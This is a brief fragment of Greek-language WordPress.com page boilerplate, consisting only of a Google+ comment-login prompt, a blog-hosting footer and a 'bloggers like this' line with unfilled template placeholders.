Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Google+. Αποσύνδεση / Αλλαγή )

Σύνδεση με %s

Blog στο WordPress.com.

Αρέσει σε %d bloggers: